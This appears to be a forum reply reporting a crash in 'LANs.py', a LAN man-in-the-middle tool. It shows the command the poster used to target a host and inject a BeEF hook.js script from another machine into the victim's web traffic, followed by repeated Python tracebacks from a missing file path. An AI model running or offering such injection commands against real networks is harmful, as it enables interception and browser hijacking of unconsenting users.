Nice script flyingtriangle. When i run it with beef using
python LANs.py -u -p -n -ip 192.168.0.6 -b
http://192.168.0.9:3000/hook.js
goes fine until:
[+] Nmap done: 1 IP address (1 host up) scanned in 30.44 seconds
[*]
http://www.independent.co.uk/news/uk...s-8974102.html
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')
IOError: [Errno 2] No such file or directory: '/home/user/projects/origBody'
callback failure !
Traceback (most recent call last):
File "LANs.py", line 169, in start
self.injecthtml(load, ack, pkt, payload, dport, sport)
File "LANs.py", line 239, in injecthtml
debugger = open('/home/user/projects/origBody', 'w')